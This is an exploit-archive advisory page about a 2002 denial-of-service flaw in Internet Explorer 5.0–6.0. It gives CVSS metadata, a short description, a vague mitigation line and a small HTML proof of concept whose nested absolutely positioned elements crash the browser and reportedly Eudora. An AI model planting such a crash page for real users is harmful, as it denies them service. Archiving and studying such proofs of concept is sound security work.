header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
2.6
CVSS
LOW
Absolute Positioning
119
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.0
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Denial of Service in Microsoft Internet Explorer

A problem has been reported in Microsoft Internet Explorer when absolute positioning is used. Because of this, it may be possible to deny service to users of the browser. This issue may be due to memory corruption, however, it is known not at this point if it may be exploited to execute arbitrary code. It has been reported that the exploit code for this issue may also cause Eudora to crash. This may simply be due to Internet Explorer being set to render HTML content for Eudora.

Mitigation:

Ensure that absolute positioning is used only when necessary and that it is used in a secure manner.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8758/info

A problem has been reported in Microsoft Internet Explorer when absolute positioning is used. Because of this, it may be possible to deny service to users of the browser. This issue may be due to memory corruption, however, it is known not at this point if it may be exploited to execute arbitrary code.

It has been reported that the exploit code for this issue may also cause Eudora to crash. This may simply be due to Internet Explorer being set to render HTML content for Eudora.

<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>

Navigation

Suggest Exploit

Services By CQR